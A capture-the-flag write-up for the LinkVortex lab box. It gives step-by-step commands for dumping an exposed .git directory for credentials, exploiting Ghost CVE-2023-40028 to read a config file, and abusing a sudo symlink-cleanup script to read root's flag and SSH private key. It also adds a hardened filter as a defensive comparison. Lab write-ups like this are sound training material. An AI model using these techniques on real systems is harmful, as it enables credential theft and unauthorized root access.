Explore the fundamentals of cybersecurity in the LinkVortex Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup explains the key concepts clearly and simply, making it accessible to players at this level.

Add Hosts#

10.10.11.47 dev.linkvortex.htb linkvortex.htb

Script to add hosts automatically#

ip="10.10.11.47"
domain="dev.linkvortex.htb linkvortex.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV linkvortex.htb
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up (0.050s latency).
rDNS record for 10.10.11.47: dev.linkvortex.htb
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: BitByBit Hardware
| http-robots.txt: 4 disallowed entries 
|_/ghost/ /p/ /email/ /r/
|_http-generator: Ghost 5.58
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain Enumeration:

ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://linkvortex.htb -H 'Host: FUZZ.linkvortex.htb' -fs 230
  • dev

Directory enumeration on the dev vhost:

dirb dev.linkvortex.htb
  • .git

The exposed .git directory is dumped and searched for credentials:

git-dumper http://dev.linkvortex.htb ./dump
grep "password" ./dump/ghost/core/test/regression/api/admin/authentication.test.js

This yields OctopiFociPilfer45

These are the admin credentials for the Ghost instance. CVE-2023-40028 (an authenticated arbitrary file read in Ghost, fixed in 5.59.1) is then used to read files from the container:

git clone https://github.com/0xyassine/CVE-2023-40028
cd CVE-2023-40028
nano ./CVE-2023-40028.sh # change the 127.0.0.1 to your target
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45

In the dumped .git, we found Dockerfile.ghost, which reveals the container path to config.production.json at /var/lib/ghost/config.production.json. That is the path to request through the exploit:

/var/lib/ghost/config.production.json

Output:

{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

This yields fibber-talented-worth

ssh bob@linkvortex.htb
cat user.txt
sudo -l

Output:

 (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
cat /opt/ghost/clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

The script quarantines .png symbolic links, blocks links whose target mentions /etc or /root, and optionally prints the quarantined file's contents (CHECK_CONTENT=true). The check, however, runs readlink on the argument only, so it sees just the first hop of the link and then grep-matches the substrings "etc" and "root" against it. A .png link that points to a second link, whose own target is in /root, passes the filter, and with CHECK_CONTENT=true the script reads the final file as root.

ln -s /root/root.txt pwn.txt
ln -s /home/bob/pwn.txt pwn.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png

Reveals the root flag.
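As a defensive counterpart, added here and not part of the box or this writeup: the original one-hop readlink/grep check beside a hardened filter that canonicalises the whole chain with readlink -f and only accepts targets under an allow-listed directory. ALLOWED_ROOT and the fixture paths are assumptions for the demo, and a temp directory stands in for /root so it runs unprivileged.

```shell
#!/bin/bash
# Added example, not the script from the box: the original one-hop filter
# next to a hardened one, so their behaviour on a chained symlink is testable.
# ALLOWED_ROOT and the fixture paths are assumptions for this demo.
ALLOWED_ROOT="${ALLOWED_ROOT:-/var/lib/ghost/content}"

# Original logic: inspect only the first hop (readlink) and grep for substrings.
# Returns 0 when the link would be quarantined (and possibly printed), 1 when removed.
original_filter() {
  first_hop=$(readlink "$1") || return 1
  if printf '%s\n' "$first_hop" | grep -Eq '(etc|root)'; then
    return 1          # "critical file" branch: link is unlinked
  fi
  return 0            # quarantine branch: content may be printed
}

# Hardened logic: canonicalise the whole chain with readlink -f and require the
# final target to sit under an allow-listed directory; no substring matching.
# Returns 0 = accept, 1 = reject, 2 = not a .png symlink.
hardened_filter() {
  case "$1" in *.png) ;; *) return 2 ;; esac
  [ -L "$1" ] || return 2
  target=$(readlink -f "$1") || return 1
  allowed=$(readlink -f "$ALLOWED_ROOT") || return 1
  case "$target" in
    "$allowed"/*) return 0 ;;   # inside the content tree
    *) return 1 ;;              # anything else, including a file reached via a hop
  esac
}

# Constructed fixture mirroring the writeup's chain (pwn.png -> pwn.txt -> secret),
# using a temp dir in place of /root so it runs unprivileged. Prints the dir.
build_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/content" "$d/secret"
  printf 'flag\n' > "$d/secret/root.txt"
  printf 'img\n' > "$d/content/real.png"
  ln -s secret/root.txt "$d/pwn.txt"   # second hop: the one that mentions "root"
  ln -s pwn.txt "$d/pwn.png"           # first hop: what readlink alone sees
  ln -s content/real.png "$d/ok.png"   # legitimate link inside the content tree
  printf '%s\n' "$d"
}
```

The original filter lets pwn.png through because its first hop is just "pwn.txt", while the hardened filter rejects it and still accepts ok.png.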

Beyond Root#

The same technique, this time aimed at the root user's private key:

ln -s /root/.ssh/id_rsa hacking.txt
ln -s /home/bob/hacking.txt bild.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/bild.png
echo -n 'Waiting for the key to be copied. Press Enter to continue: '; read
nano /tmp/id_rsa
chmod 600 /tmp/id_rsa
ssh -i /tmp/id_rsa root@127.0.0.1

Alternatively, copy the printed id_rsa private key to your own machine and use it to SSH into the target as root from there.